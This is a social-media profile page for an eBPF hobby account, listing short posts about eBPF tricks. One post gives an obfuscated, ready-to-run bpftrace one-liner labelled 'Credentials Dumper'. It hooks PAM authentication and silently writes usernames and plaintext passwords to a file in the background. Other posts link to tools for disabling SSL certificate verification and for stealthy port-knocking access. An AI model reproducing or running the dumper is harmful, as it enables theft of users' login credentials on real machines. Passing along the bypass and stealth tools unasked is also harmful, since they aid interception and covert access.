ebpftoy

@ebpftoy

Fun with eBPF

Katılım Temmuz 2022

0 Takip Edilen20 Takipçiler

ebpftoy@ebpftoy·9 Ağu

Knockles ➞ An eBPF Port Knocking Tool 👀

eeriedusk@eeriedusk

Here is Knockles 🦔! An eBPF port knocking tool made to remotely open a TCP connection while being completely invisible to port scanners. Enjoy! 🚪🐝 github.com/eeriedusk/knoc…

English

ebpftoy@ebpftoy·5 Ağu

Kill program that access to /tmp/secret.txt #eBPF bpftrace --unsafe -e 'tracepoint:syscalls:sys_enter_openat { if (strncmp("/tmp/secret.txt", str(args->filename), 15) == 0) { signal(9); }}'

GIF

English

ebpftoy@ebpftoy·15 Tem

Disable SSL certificate verification using eBPF : github.com/citronneur/bli…

English

ebpftoy@ebpftoy·7 Tem

ZXX

ebpftoy@ebpftoy·7 Tem

Credentials Dumper a="probe:/*b/x*u/*pam.*.0:pam_get_authtok";c="@handle[tid]";d=",str(*((uint64*)";sudo bpftrace -e "BEGIN {printf(\"pid,comm,user,pass\n\");}u$a{$c=arg0;}uret$a/$c/{printf(\"%d,%s,%s,%s\n\",tid,comm$d($c+48)))$d$c)));delete($c);}"|sudo tee /tmp/auth>/*/null&

GIF

English

Keşfet

@handle @elonmusk @BarackObama @taylorswift13 @cristiano @BillGates @NASA @nikifrancismediavine